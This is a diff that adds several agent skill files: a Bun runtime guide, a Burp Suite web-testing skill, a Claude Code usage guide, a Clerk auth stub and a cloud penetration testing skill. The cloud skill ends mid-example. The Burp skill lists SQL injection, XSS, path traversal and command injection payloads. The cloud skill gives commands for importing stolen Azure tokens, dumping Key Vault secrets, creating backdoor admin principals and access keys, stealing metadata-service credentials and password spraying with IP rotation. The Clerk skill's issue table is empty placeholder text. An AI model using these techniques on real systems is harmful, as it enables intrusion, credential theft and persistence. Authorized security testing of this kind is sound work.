const dbUrl = process.env.DATABASE_URL;
```
```bash
# Run with specific env file
bun --env-file=.env.production run index.ts
```
---
## 5. Built-in APIs
### 5.1 File System (Bun.file)
```typescript
// Read file
const file = Bun.file("./data.json");
const text = await file.text();
const json = await file.json();
const buffer = await file.arrayBuffer();
// File info
console.log(file.size); // bytes
console.log(file.type); // MIME type
// Write file
await Bun.write("./output.txt", "Hello, Bun!");
await Bun.write("./data.json", JSON.stringify({ foo: "bar" }));
// Stream large files
const reader = file.stream();
for await (const chunk of reader) {
console.log(chunk);
}
```
### 5.2 HTTP Server (Bun.serve)
```typescript
const server = Bun.serve({
port: 3000,
fetch(request) {
const url = new URL(request.url);
if (url.pathname === "/") {
return new Response("Hello World!");
}
if (url.pathname === "/api/users") {
return Response.json([
{ id: 1, name: "Alice" },
{ id: 2, name: "Bob" },
]);
}
return new Response("Not Found", { status: 404 });
},
error(error) {
return new Response(`Error: ${error.message}`, { status: 500 });
},
});
console.log(`Server running at http://localhost:${server.port}`);
```
### 5.3 WebSocket Server
```typescript
const server = Bun.serve({
port: 3000,
fetch(req, server) {
// Upgrade to WebSocket
if (server.upgrade(req)) {
return; // Upgraded
}
return new Response("Upgrade failed", { status: 500 });
},
websocket: {
open(ws) {
console.log("Client connected");
ws.send("Welcome!");
},
message(ws, message) {
console.log(`Received: ${message}`);
ws.send(`Echo: ${message}`);
},
close(ws) {
console.log("Client disconnected");
},
},
});
```
### 5.4 SQLite (Bun.sql)
```typescript
import { Database } from "bun:sqlite";
const db = new Database("mydb.sqlite");
// Create table
db.run(`
CREATE TABLE IF NOT EXISTS users (
id INTEGER PRIMARY KEY AUTOINCREMENT,
name TEXT NOT NULL,
email TEXT UNIQUE
)
`);
// Insert
const insert = db.prepare("INSERT INTO users (name, email) VALUES (?, ?)");
insert.run("Alice", "alice@example.com");
// Query
const query = db.prepare("SELECT * FROM users WHERE name = ?");
const user = query.get("Alice");
console.log(user); // { id: 1, name: "Alice", email: "alice@example.com" }
// Query all
const allUsers = db.query("SELECT * FROM users").all();
```
### 5.5 Password Hashing
```typescript
// Hash password
const password = "super-secret";
const hash = await Bun.password.hash(password);
// Verify password
const isValid = await Bun.password.verify(password, hash);
console.log(isValid); // true
// With algorithm options
const bcryptHash = await Bun.password.hash(password, {
algorithm: "bcrypt",
cost: 12,
});
```
---
## 6. Testing
### 6.1 Basic Tests
```typescript
// math.test.ts
import { describe, it, expect, beforeAll, afterAll } from "bun:test";
describe("Math operations", () => {
it("adds two numbers", () => {
expect(1 + 1).toBe(2);
});
it("subtracts two numbers", () => {
expect(5 - 3).toBe(2);
});
});
```
### 6.2 Running Tests
```bash
# Run all tests
bun test
# Run specific file
bun test math.test.ts
# Run matching pattern
bun test --grep "adds"
# Watch mode
bun test --watch
# With coverage
bun test --coverage
# Timeout
bun test --timeout 5000
```
### 6.3 Matchers
```typescript
import { expect, test } from "bun:test";
test("matchers", () => {
// Equality
expect(1).toBe(1);
expect({ a: 1 }).toEqual({ a: 1 });
expect([1, 2]).toContain(1);
// Comparisons
expect(10).toBeGreaterThan(5);
expect(5).toBeLessThanOrEqual(5);
// Truthiness
expect(true).toBeTruthy();
expect(null).toBeNull();
expect(undefined).toBeUndefined();
// Strings
expect("hello").toMatch(/ell/);
expect("hello").toContain("ell");
// Arrays
expect([1, 2, 3]).toHaveLength(3);
// Exceptions
expect(() => {
throw new Error("fail");
}).toThrow("fail");
// Async
await expect(Promise.resolve(1)).resolves.toBe(1);
await expect(Promise.reject("err")).rejects.toBe("err");
});
```
### 6.4 Mocking
```typescript
import { mock, spyOn } from "bun:test";
// Mock function
const mockFn = mock((x: number) => x * 2);
mockFn(5);
expect(mockFn).toHaveBeenCalled();
expect(mockFn).toHaveBeenCalledWith(5);
expect(mockFn.mock.results[0].value).toBe(10);
// Spy on method
const obj = {
method: () => "original",
};
const spy = spyOn(obj, "method").mockReturnValue("mocked");
expect(obj.method()).toBe("mocked");
expect(spy).toHaveBeenCalled();
```
---
## 7. Bundling
### 7.1 Basic Build
```bash
# Bundle for production
bun build ./src/index.ts --outdir ./dist
# With options
bun build ./src/index.ts \
--outdir ./dist \
--target browser \
--minify \
--sourcemap
```
### 7.2 Build API
```typescript
const result = await Bun.build({
entrypoints: ["./src/index.ts"],
outdir: "./dist",
target: "browser", // or "bun", "node"
minify: true,
sourcemap: "external",
splitting: true,
format: "esm",
// External packages (not bundled)
external: ["react", "react-dom"],
// Define globals
define: {
"process.env.NODE_ENV": JSON.stringify("production"),
},
// Naming
naming: {
entry: "[name].[hash].js",
chunk: "chunks/[name].[hash].js",
asset: "assets/[name].[hash][ext]",
},
});
if (!result.success) {
console.error(result.logs);
}
```
### 7.3 Compile to Executable
```bash
# Create standalone executable
bun build ./src/cli.ts --compile --outfile myapp
# Cross-compile
bun build ./src/cli.ts --compile --target=bun-linux-x64 --outfile myapp-linux
bun build ./src/cli.ts --compile --target=bun-darwin-arm64 --outfile myapp-mac
# With embedded assets
bun build ./src/cli.ts --compile --outfile myapp --embed ./assets
```
---
## 8. Migration from Node.js
### 8.1 Compatibility
```typescript
// Most Node.js APIs work out of the box
import fs from "fs";
import path from "path";
import crypto from "crypto";
// process is global
console.log(process.cwd());
console.log(process.env.HOME);
// Buffer is global
const buf = Buffer.from("hello");
// __dirname and __filename work
console.log(__dirname);
console.log(__filename);
```
### 8.2 Common Migration Steps
```bash
# 1. Install Bun
curl -fsSL https://bun.sh/install | bash
# 2. Replace package manager
rm -rf node_modules package-lock.json
bun install
# 3. Update scripts in package.json
# "start": "node index.js" → "start": "bun run index.ts"
# "test": "jest" → "test": "bun test"
# 4. Add Bun types
bun add -d @types/bun
```
### 8.3 Differences from Node.js
```typescript
// ❌ Node.js specific (may not work)
require("module") // Use import instead
require.resolve("pkg") // Use import.meta.resolve
__non_webpack_require__ // Not supported
// ✅ Bun equivalents
import pkg from "pkg";
const resolved = import.meta.resolve("pkg");
Bun.resolveSync("pkg", process.cwd());
// ❌ These globals differ
process.hrtime() // Use Bun.nanoseconds()
setImmediate() // Use queueMicrotask()
// ✅ Bun-specific features
const file = Bun.file("./data.txt"); // Fast file API
Bun.serve({ port: 3000, fetch: ... }); // Fast HTTP server
Bun.password.hash(password); // Built-in hashing
```
---
## 9. Performance Tips
### 9.1 Use Bun-native APIs
```typescript
// Slow (Node.js compat)
import fs from "fs/promises";
const content = await fs.readFile("./data.txt", "utf-8");
// Fast (Bun-native)
const file = Bun.file("./data.txt");
const content = await file.text();
```
### 9.2 Use Bun.serve for HTTP
```typescript
// Don't: Express/Fastify (overhead)
import express from "express";
const app = express();
// Do: Bun.serve (native, 4-10x faster)
Bun.serve({
fetch(req) {
return new Response("Hello!");
},
});
// Or use Elysia (Bun-optimized framework)
import { Elysia } from "elysia";
new Elysia().get("/", () => "Hello!").listen(3000);
```
### 9.3 Bundle for Production
```bash
# Always bundle and minify for production
bun build ./src/index.ts --outdir ./dist --minify --target node
# Then run the bundle
bun run ./dist/index.js
```
---
## Quick Reference
| Task | Command |
| :----------- | :----------------------------------------- |
| Init project | `bun init` |
| Install deps | `bun install` |
| Add package | `bun add <pkg>` |
| Run script | `bun run <script>` |
| Run file | `bun run file.ts` |
| Watch mode | `bun --watch run file.ts` |
| Run tests | `bun test` |
| Build | `bun build ./src/index.ts --outdir ./dist` |
| Execute pkg | `bunx <pkg>` |
---
## Resources
- [Bun Documentation](https://bun.sh/docs)
- [Bun GitHub](https://github.com/oven-sh/bun)
- [Elysia Framework](https://elysiajs.com/)
- [Bun Discord](https://bun.sh/discord)

377
skills/burp-suite-testing/SKILL.md Normal file
View File

@@ -0,0 +1,377 @@
---
name: Burp Suite Web Application Testing
description: This skill should be used when the user asks to "intercept HTTP traffic", "modify web requests", "use Burp Suite for testing", "perform web vulnerability scanning", "test with Burp Repeater", "analyze HTTP history", or "configure proxy for web testing". It provides comprehensive guidance for using Burp Suite's core features for web application security testing.
---
# Burp Suite Web Application Testing
## Purpose
Execute comprehensive web application security testing using Burp Suite's integrated toolset, including HTTP traffic interception and modification, request analysis and replay, automated vulnerability scanning, and manual testing workflows. This skill enables systematic discovery and exploitation of web application vulnerabilities through proxy-based testing methodology.
## Inputs / Prerequisites
### Required Tools
- Burp Suite Community or Professional Edition installed
- Burp's embedded browser or configured external browser
- Target web application URL
- Valid credentials for authenticated testing (if applicable)
### Environment Setup
- Burp Suite launched with temporary or named project
- Proxy listener active on 127.0.0.1:8080 (default)
- Browser configured to use Burp proxy (or use Burp's browser)
- CA certificate installed for HTTPS interception
### Editions Comparison
| Feature | Community | Professional |
|---------|-----------|--------------|
| Proxy | ✓ | ✓ |
| Repeater | ✓ | ✓ |
| Intruder | Limited | Full |
| Scanner | ✗ | ✓ |
| Extensions | ✓ | ✓ |
## Outputs / Deliverables
### Primary Outputs
- Intercepted and modified HTTP requests/responses
- Vulnerability scan reports with remediation advice
- HTTP history and site map documentation
- Proof-of-concept exploits for identified vulnerabilities
## Core Workflow
### Phase 1: Intercepting HTTP Traffic
#### Launch Burp's Browser
Navigate to integrated browser for seamless proxy integration:
1. Open Burp Suite and create/open project
2. Go to **Proxy > Intercept** tab
3. Click **Open Browser** to launch preconfigured browser
4. Position windows to view both Burp and browser simultaneously
#### Configure Interception
Control which requests are captured:
```
Proxy > Intercept > Intercept is on/off toggle
When ON: Requests pause for review/modification
When OFF: Requests pass through, logged to history
```
#### Intercept and Forward Requests
Process intercepted traffic:
1. Set intercept toggle to **Intercept on**
2. Navigate to target URL in browser
3. Observe request held in Proxy > Intercept tab
4. Review request contents (headers, parameters, body)
5. Click **Forward** to send request to server
6. Continue forwarding subsequent requests until page loads
#### View HTTP History
Access complete traffic log:
1. Go to **Proxy > HTTP history** tab
2. Click any entry to view full request/response
3. Sort by clicking column headers (# for chronological order)
4. Use filters to focus on relevant traffic
### Phase 2: Modifying Requests
#### Intercept and Modify
Change request parameters before forwarding:
1. Enable interception: **Intercept on**
2. Trigger target request in browser
3. Locate parameter to modify in intercepted request
4. Edit value directly in request editor
5. Click **Forward** to send modified request
#### Common Modification Targets
| Target | Example | Purpose |
|--------|---------|---------|
| Price parameters | `price=1` | Test business logic |
| User IDs | `userId=admin` | Test access control |
| Quantity values | `qty=-1` | Test input validation |
| Hidden fields | `isAdmin=true` | Test privilege escalation |
#### Example: Price Manipulation
```http
POST /cart HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
productId=1&quantity=1&price=100
# Modify to:
productId=1&quantity=1&price=1
```
Result: Item added to cart at modified price.
### Phase 3: Setting Target Scope
#### Define Scope
Focus testing on specific target:
1. Go to **Target > Site map**
2. Right-click target host in left panel
3. Select **Add to scope**
4. When prompted, click **Yes** to exclude out-of-scope traffic
#### Filter by Scope
Remove noise from HTTP history:
1. Click display filter above HTTP history
2. Select **Show only in-scope items**
3. History now shows only target site traffic
#### Scope Benefits
- Reduces clutter from third-party requests
- Prevents accidental testing of out-of-scope sites
- Improves scanning efficiency
- Creates cleaner reports
### Phase 4: Using Burp Repeater
#### Send Request to Repeater
Prepare request for manual testing:
1. Identify interesting request in HTTP history
2. Right-click request and select **Send to Repeater**
3. Go to **Repeater** tab to access request
#### Modify and Resend
Test different inputs efficiently:
```
1. View request in Repeater tab
2. Modify parameter values
3. Click Send to submit request
4. Review response in right panel
5. Use navigation arrows to review request history
```
#### Repeater Testing Workflow
```
Original Request:
GET /product?productId=1 HTTP/1.1
Test 1: productId=2 → Valid product response
Test 2: productId=999 → Not Found response
Test 3: productId=' → Error/exception response
Test 4: productId=1 OR 1=1 → SQL injection test
```
#### Analyze Responses
Look for indicators of vulnerabilities:
- Error messages revealing stack traces
- Framework/version information disclosure
- Different response lengths indicating logic flaws
- Timing differences suggesting blind injection
- Unexpected data in responses
### Phase 5: Running Automated Scans
#### Launch New Scan
Initiate vulnerability scanning (Professional only):
1. Go to **Dashboard** tab
2. Click **New scan**
3. Enter target URL in **URLs to scan** field
4. Configure scan settings
#### Scan Configuration Options
| Mode | Description | Duration |
|------|-------------|----------|
| Lightweight | High-level overview | ~15 minutes |
| Fast | Quick vulnerability check | ~30 minutes |
| Balanced | Standard comprehensive scan | ~1-2 hours |
| Deep | Thorough testing | Several hours |
#### Monitor Scan Progress
Track scanning activity:
1. View task status in **Dashboard**
2. Watch **Target > Site map** update in real-time
3. Check **Issues** tab for discovered vulnerabilities
#### Review Identified Issues
Analyze scan findings:
1. Select scan task in Dashboard
2. Go to **Issues** tab
3. Click issue to view:
- **Advisory**: Description and remediation
- **Request**: Triggering HTTP request
- **Response**: Server response showing vulnerability
### Phase 6: Intruder Attacks
#### Configure Intruder
Set up automated attack:
1. Send request to Intruder (right-click > Send to Intruder)
2. Go to **Intruder** tab
3. Define payload positions using § markers
4. Select attack type
#### Attack Types
| Type | Description | Use Case |
|------|-------------|----------|
| Sniper | Single position, iterate payloads | Fuzzing one parameter |
| Battering ram | Same payload all positions | Credential testing |
| Pitchfork | Parallel payload iteration | Username:password pairs |
| Cluster bomb | All payload combinations | Full brute force |
#### Configure Payloads
```
Positions Tab:
POST /login HTTP/1.1
...
username=§admin§&password=§password§
Payloads Tab:
Set 1: admin, user, test, guest
Set 2: password, 123456, admin, letmein
```
#### Analyze Results
Review attack output:
- Sort by response length to find anomalies
- Filter by status code for successful attempts
- Use grep to search for specific strings
- Export results for documentation
## Quick Reference
### Keyboard Shortcuts
| Action | Windows/Linux | macOS |
|--------|---------------|-------|
| Forward request | Ctrl+F | Cmd+F |
| Drop request | Ctrl+D | Cmd+D |
| Send to Repeater | Ctrl+R | Cmd+R |
| Send to Intruder | Ctrl+I | Cmd+I |
| Toggle intercept | Ctrl+T | Cmd+T |
### Common Testing Payloads
```
# SQL Injection
' OR '1'='1
' OR '1'='1'--
1 UNION SELECT NULL--
# XSS
<script>alert(1)</script>
"><img src=x onerror=alert(1)>
javascript:alert(1)
# Path Traversal
../../../etc/passwd
..\..\..\..\windows\win.ini
# Command Injection
; ls -la
| cat /etc/passwd
`whoami`
```
### Request Modification Tips
- Right-click for context menu options
- Use decoder for encoding/decoding
- Compare requests using Comparer tool
- Save interesting requests to project
## Constraints and Guardrails
### Operational Boundaries
- Test only authorized applications
- Configure scope to prevent accidental out-of-scope testing
- Rate-limit scans to avoid denial of service
- Document all findings and actions
### Technical Limitations
- Community Edition lacks automated scanner
- Some sites may block proxy traffic
- HSTS/certificate pinning may require additional configuration
- Heavy scanning may trigger WAF blocks
### Best Practices
- Always set target scope before extensive testing
- Use Burp's browser for reliable interception
- Save project regularly to preserve work
- Review scan results manually for false positives
## Examples
### Example 1: Business Logic Testing
**Scenario**: E-commerce price manipulation
1. Add item to cart normally, intercept request
2. Identify `price=9999` parameter in POST body
3. Modify to `price=1`
4. Forward request
5. Complete checkout at manipulated price
**Finding**: Server trusts client-provided price values.
### Example 2: Authentication Bypass
**Scenario**: Testing login form
1. Submit valid credentials, capture request in Repeater
2. Send to Repeater for testing
3. Try: `username=admin' OR '1'='1'--`
4. Observe successful login response
**Finding**: SQL injection in authentication.
### Example 3: Information Disclosure
**Scenario**: Error-based information gathering
1. Navigate to product page, observe `productId` parameter
2. Send request to Repeater
3. Change `productId=1` to `productId=test`
4. Observe verbose error revealing framework version
**Finding**: Apache Struts 2.5.12 disclosed in stack trace.
## Troubleshooting
### Browser Not Connecting Through Proxy
- Verify proxy listener is active (Proxy > Options)
- Check browser proxy settings point to 127.0.0.1:8080
- Ensure no firewall blocking local connections
- Use Burp's embedded browser for reliable setup
### HTTPS Interception Failing
- Install Burp CA certificate in browser/system
- Navigate to http://burp to download certificate
- Add certificate to trusted roots
- Restart browser after installation
### Slow Performance
- Limit scope to reduce processing
- Disable unnecessary extensions
- Increase Java heap size in startup options
- Close unused Burp tabs and features
### Requests Not Being Intercepted
- Verify "Intercept on" is enabled
- Check intercept rules aren't filtering target
- Ensure browser is using Burp proxy
- Verify target isn't using unsupported protocol

68
skills/claude-code-guide/SKILL.md Normal file
View File

@@ -0,0 +1,68 @@
---
name: Claude Code Guide
description: Master guide for using Claude Code effectively. Includes configuration templates, prompting strategies "Thinking" keywords, debugging techniques, and best practices for interacting with the agent.
---
# Claude Code Guide
## Purpose
To provide a comprehensive reference for configuring and using Claude Code (the agentic coding tool) to its full potential. This skill synthesizes best practices, configuration templates, and advanced usage patterns.
## Configuration (`CLAUDE.md`)
When starting a new project, create a `CLAUDE.md` file in the root directory to guide the agent.
### Template (General)
```markdown
# Project Guidelines
## Commands
- Run app: `npm run dev`
- Test: `npm test`
- Build: `npm run build`
## Code Style
- Use TypeScript for all new code.
- Functional components with Hooks for React.
- Tailwind CSS for styling.
- Early returns for error handling.
## Workflow
- Read `README.md` first to understand project context.
- Before editing, read the file content.
- After editing, run tests to verify.
```
## Advanced Features
### Thinking Keywords
Use these keywords in your prompts to trigger deeper reasoning from the agent:
- "Think step-by-step"
- "Analyze the root cause"
- "Plan before executing"
- "Verify your assumptions"
### Debugging
If the agent is stuck or behaving unexpectedly:
1. **Clear Context**: Start a new session or ask the agent to "forget previous instructions" if confused.
2. **Explicit Instructions**: Be extremely specific about paths, filenames, and desired outcomes.
3. **Logs**: Ask the agent to "check the logs" or "run the command with verbose output".
## Best Practices
1. **Small Contexts**: Don't dump the entire codebase into the context. Use `grep` or `find` to locate relevant files first.
2. **Iterative Development**: Ask for small changes, verify, then proceed.
3. **Feedback Loop**: If the agent makes a mistake, correct it immediately and ask it to "add a lesson" to its memory (if supported) or `CLAUDE.md`.
## Reference
Based on [Claude Code Guide by zebbern](https://github.com/zebbern/claude-code-guide).

56
skills/clerk-auth/SKILL.md Normal file
View File

@@ -0,0 +1,56 @@
---
name: clerk-auth
description: "Expert patterns for Clerk auth implementation, middleware, organizations, webhooks, and user sync Use when: adding authentication, clerk auth, user authentication, sign in, sign up."
source: vibeship-spawner-skills (Apache 2.0)
---
# Clerk Authentication
## Patterns
### Next.js App Router Setup
Complete Clerk setup for Next.js 14/15 App Router.
Includes ClerkProvider, environment variables, and basic
sign-in/sign-up components.
Key components:
- ClerkProvider: Wraps app for auth context
- <SignIn />, <SignUp />: Pre-built auth forms
- <UserButton />: User menu with session management
### Middleware Route Protection
Protect routes using clerkMiddleware and createRouteMatcher.
Best practices:
- Single middleware.ts file at project root
- Use createRouteMatcher for route groups
- auth.protect() for explicit protection
- Centralize all auth logic in middleware
### Server Component Authentication
Access auth state in Server Components using auth() and currentUser().
Key functions:
- auth(): Returns userId, sessionId, orgId, claims
- currentUser(): Returns full User object
- Both require clerkMiddleware to be configured
## ⚠️ Sharp Edges
| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | critical | See docs |
| Issue | high | See docs |
| Issue | high | See docs |
| Issue | high | See docs |
| Issue | medium | See docs |
| Issue | medium | See docs |
| Issue | medium | See docs |
| Issue | medium | See docs |

498
skills/cloud-penetration-testing/SKILL.md Normal file
View File

@@ -0,0 +1,498 @@
---
name: Cloud Penetration Testing
description: This skill should be used when the user asks to "perform cloud penetration testing", "assess Azure or AWS or GCP security", "enumerate cloud resources", "exploit cloud misconfigurations", "test O365 security", "extract secrets from cloud environments", or "audit cloud infrastructure". It provides comprehensive techniques for security assessment across major cloud platforms.
---
# Cloud Penetration Testing
## Purpose
Conduct comprehensive security assessments of cloud infrastructure across Microsoft Azure, Amazon Web Services (AWS), and Google Cloud Platform (GCP). This skill covers reconnaissance, authentication testing, resource enumeration, privilege escalation, data extraction, and persistence techniques for authorized cloud security engagements.
## Prerequisites
### Required Tools
```bash
# Azure tools
Install-Module -Name Az -AllowClobber -Force
Install-Module -Name MSOnline -Force
Install-Module -Name AzureAD -Force
# AWS CLI
curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
unzip awscliv2.zip && sudo ./aws/install
# GCP CLI
curl https://sdk.cloud.google.com | bash
gcloud init
# Additional tools
pip install scoutsuite pacu
```
### Required Knowledge
- Cloud architecture fundamentals
- Identity and Access Management (IAM)
- API authentication mechanisms
- DevOps and automation concepts
### Required Access
- Written authorization for testing
- Test credentials or access tokens
- Defined scope and rules of engagement
## Outputs and Deliverables
1. **Cloud Security Assessment Report** - Comprehensive findings and risk ratings
2. **Resource Inventory** - Enumerated services, storage, and compute instances
3. **Credential Findings** - Exposed secrets, keys, and misconfigurations
4. **Remediation Recommendations** - Hardening guidance per platform
## Core Workflow
### Phase 1: Reconnaissance
Gather initial information about target cloud presence:
```bash
# Azure: Get federation info
curl "https://login.microsoftonline.com/getuserrealm.srf?login=user@target.com&xml=1"
# Azure: Get Tenant ID
curl "https://login.microsoftonline.com/target.com/v2.0/.well-known/openid-configuration"
# Enumerate cloud resources by company name
python3 cloud_enum.py -k targetcompany
# Check IP against cloud providers
cat ips.txt | python3 ip2provider.py
```
### Phase 2: Azure Authentication
Authenticate to Azure environments:
```powershell
# Az PowerShell Module
Import-Module Az
Connect-AzAccount
# With credentials (may bypass MFA)
$credential = Get-Credential
Connect-AzAccount -Credential $credential
# Import stolen context
Import-AzContext -Profile 'C:\Temp\StolenToken.json'
# Export context for persistence
Save-AzContext -Path C:\Temp\AzureAccessToken.json
# MSOnline Module
Import-Module MSOnline
Connect-MsolService
```
### Phase 3: Azure Enumeration
Discover Azure resources and permissions:
```powershell
# List contexts and subscriptions
Get-AzContext -ListAvailable
Get-AzSubscription
# Current user role assignments
Get-AzRoleAssignment
# List resources
Get-AzResource
Get-AzResourceGroup
# Storage accounts
Get-AzStorageAccount
# Web applications
Get-AzWebApp
# SQL Servers and databases
Get-AzSQLServer
Get-AzSqlDatabase -ServerName $Server -ResourceGroupName $RG
# Virtual machines
Get-AzVM
$vm = Get-AzVM -Name "VMName"
$vm.OSProfile
# List all users
Get-MSolUser -All
# List all groups
Get-MSolGroup -All
# Global Admins
Get-MsolRole -RoleName "Company Administrator"
Get-MSolGroupMember -GroupObjectId $GUID
# Service Principals
Get-MsolServicePrincipal
```
### Phase 4: Azure Exploitation
Exploit Azure misconfigurations:
```powershell
# Search user attributes for passwords
$users = Get-MsolUser -All
foreach($user in $users){
$props = @()
$user | Get-Member | foreach-object{$props+=$_.Name}
foreach($prop in $props){
if($user.$prop -like "*password*"){
Write-Output ("[*]" + $user.UserPrincipalName + "[" + $prop + "]" + " : " + $user.$prop)
}
}
}
# Execute commands on VMs
Invoke-AzVMRunCommand -ResourceGroupName $RG -VMName $VM -CommandId RunPowerShellScript -ScriptPath ./script.ps1
# Extract VM UserData
$vms = Get-AzVM
$vms.UserData
# Dump Key Vault secrets
az keyvault list --query '[].name' --output tsv
az keyvault set-policy --name <vault> --upn <user> --secret-permissions get list
az keyvault secret list --vault-name <vault> --query '[].id' --output tsv
az keyvault secret show --id <URI>
```
### Phase 5: Azure Persistence
Establish persistence in Azure:
```powershell
# Create backdoor service principal
$spn = New-AzAdServicePrincipal -DisplayName "WebService" -Role Owner
$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($spn.Secret)
$UnsecureSecret = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)
# Add service principal to Global Admin
$sp = Get-MsolServicePrincipal -AppPrincipalId <AppID>
$role = Get-MsolRole -RoleName "Company Administrator"
Add-MsolRoleMember -RoleObjectId $role.ObjectId -RoleMemberType ServicePrincipal -RoleMemberObjectId $sp.ObjectId
# Login as service principal
$cred = Get-Credential # AppID as username, secret as password
Connect-AzAccount -Credential $cred -Tenant "tenant-id" -ServicePrincipal
# Create new admin user via CLI
az ad user create --display-name <name> --password <pass> --user-principal-name <upn>
```
### Phase 6: AWS Authentication
Authenticate to AWS environments:
```bash
# Configure AWS CLI
aws configure
# Enter: Access Key ID, Secret Access Key, Region, Output format
# Use specific profile
aws configure --profile target
# Test credentials
aws sts get-caller-identity
```
### Phase 7: AWS Enumeration
Discover AWS resources:
```bash
# Account information
aws sts get-caller-identity
aws iam list-users
aws iam list-roles
# S3 Buckets
aws s3 ls
aws s3 ls s3://bucket-name/
aws s3 sync s3://bucket-name ./local-dir
# EC2 Instances
aws ec2 describe-instances
# RDS Databases
aws rds describe-db-instances --region us-east-1
# Lambda Functions
aws lambda list-functions --region us-east-1
aws lambda get-function --function-name <name>
# EKS Clusters
aws eks list-clusters --region us-east-1
# Networking
aws ec2 describe-subnets
aws ec2 describe-security-groups --group-ids <sg-id>
aws directconnect describe-connections
```
### Phase 8: AWS Exploitation
Exploit AWS misconfigurations:
```bash
# Check for public RDS snapshots
aws rds describe-db-snapshots --snapshot-type manual --query=DBSnapshots[*].DBSnapshotIdentifier
aws rds describe-db-snapshot-attributes --db-snapshot-identifier <id>
# AttributeValues = "all" means publicly accessible
# Extract Lambda environment variables (may contain secrets)
aws lambda get-function --function-name <name> | jq '.Configuration.Environment'
# Access metadata service (from compromised EC2)
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# IMDSv2 access
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl http://169.254.169.254/latest/meta-data/profile -H "X-aws-ec2-metadata-token: $TOKEN"
```
### Phase 9: AWS Persistence
Establish persistence in AWS:
```bash
# List existing access keys
aws iam list-access-keys --user-name <username>
# Create backdoor access key
aws iam create-access-key --user-name <username>
# Get all EC2 public IPs
for region in $(cat regions.txt); do
aws ec2 describe-instances --query=Reservations[].Instances[].PublicIpAddress --region $region | jq -r '.[]'
done
```
### Phase 10: GCP Enumeration
Discover GCP resources:
```bash
# Authentication
gcloud auth login
gcloud auth activate-service-account --key-file creds.json
gcloud auth list
# Account information
gcloud config list
gcloud organizations list
gcloud projects list
# IAM Policies
gcloud organizations get-iam-policy <org-id>
gcloud projects get-iam-policy <project-id>
# Enabled services
gcloud services list
# Source code repos
gcloud source repos list
gcloud source repos clone <repo>
# Compute instances
gcloud compute instances list
gcloud beta compute ssh --zone "region" "instance" --project "project"
# Storage buckets
gsutil ls
gsutil ls -r gs://bucket-name
gsutil cp gs://bucket/file ./local
# SQL instances
gcloud sql instances list
gcloud sql databases list --instance <id>
# Kubernetes
gcloud container clusters list
gcloud container clusters get-credentials <cluster> --region <region>
kubectl cluster-info
```
### Phase 11: GCP Exploitation
Exploit GCP misconfigurations:
```bash
# Get metadata service data
curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true&alt=text" -H "Metadata-Flavor: Google"
# Check access scopes
curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes -H 'Metadata-Flavor:Google'
# Decrypt data with keyring
gcloud kms decrypt --ciphertext-file=encrypted.enc --plaintext-file=out.txt --key <key> --keyring <keyring> --location global
# Serverless function analysis
gcloud functions list
gcloud functions describe <name>
gcloud functions logs read <name> --limit 100
# Find stored credentials
sudo find /home -name "credentials.db"
sudo cp -r /home/user/.config/gcloud ~/.config
gcloud auth list
```
## Quick Reference
### Azure Key Commands
| Action | Command |
|--------|---------|
| Login | `Connect-AzAccount` |
| List subscriptions | `Get-AzSubscription` |
| List users | `Get-MsolUser -All` |
| List groups | `Get-MsolGroup -All` |
| Current roles | `Get-AzRoleAssignment` |
| List VMs | `Get-AzVM` |
| List storage | `Get-AzStorageAccount` |
| Key Vault secrets | `az keyvault secret list --vault-name <name>` |
### AWS Key Commands
| Action | Command |
|--------|---------|
| Configure | `aws configure` |
| Caller identity | `aws sts get-caller-identity` |
| List users | `aws iam list-users` |
| List S3 buckets | `aws s3 ls` |
| List EC2 | `aws ec2 describe-instances` |
| List Lambda | `aws lambda list-functions` |
| Metadata | `curl http://169.254.169.254/latest/meta-data/` |
### GCP Key Commands
| Action | Command |
|--------|---------|
| Login | `gcloud auth login` |
| List projects | `gcloud projects list` |
| List instances | `gcloud compute instances list` |
| List buckets | `gsutil ls` |
| List clusters | `gcloud container clusters list` |
| IAM policy | `gcloud projects get-iam-policy <project>` |
| Metadata | `curl -H "Metadata-Flavor: Google" http://metadata.google.internal/...` |
### Metadata Service URLs
| Provider | URL |
|----------|-----|
| AWS | `http://169.254.169.254/latest/meta-data/` |
| Azure | `http://169.254.169.254/metadata/instance?api-version=2018-02-01` |
| GCP | `http://metadata.google.internal/computeMetadata/v1/` |
### Useful Tools
| Tool | Purpose |
|------|---------|
| ScoutSuite | Multi-cloud security auditing |
| Pacu | AWS exploitation framework |
| AzureHound | Azure AD attack path mapping |
| ROADTools | Azure AD enumeration |
| WeirdAAL | AWS service enumeration |
| MicroBurst | Azure security assessment |
| PowerZure | Azure post-exploitation |
## Constraints and Limitations
### Legal Requirements
- Only test with explicit written authorization
- Respect scope boundaries between cloud accounts
- Do not access production customer data
- Document all testing activities
### Technical Limitations
- MFA may prevent credential-based attacks
- Conditional Access policies may restrict access
- CloudTrail/Activity Logs record all API calls
- Some resources require specific regional access
### Detection Considerations
- Cloud providers log all API activity
- Unusual access patterns trigger alerts
- Use slow, deliberate enumeration
- Consider GuardDuty, Security Center, Cloud Armor
## Examples
### Example 1: Azure Password Spray
**Scenario:** Test Azure AD password policy
```powershell
# Using MSOLSpray with FireProx for IP rotation
# First create FireProx endpoint
python fire.py --access_key <key> --secret_access_key <secret> --region us-east-1 --url https://login.microsoft.com --command create
# Spray passwords
Import-Module .\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\users.txt -Password "Spring2024!" -URL https://<api-gateway>.execute-api.us-east-1.amazonaws.com/fireprox
```
### Example 2: AWS S3 Bucket Enumeration
**Scenario:** Find and access misconfigured S3 buckets
```bash
# List all buckets
aws s3 ls | awk '{print $3}' > buckets.txt
# Check each bucket for contents
while read bucket; do
echo "Checking: $bucket"
aws s3 ls s3://$bucket 2>/dev/null
done < buckets.txt
# Download interesting bucket
aws s3 sync s3://misconfigured-bucket ./loot/
```
### Example 3: GCP Service Account Compromise
**Scenario:** Pivot using compromised service account
```bash
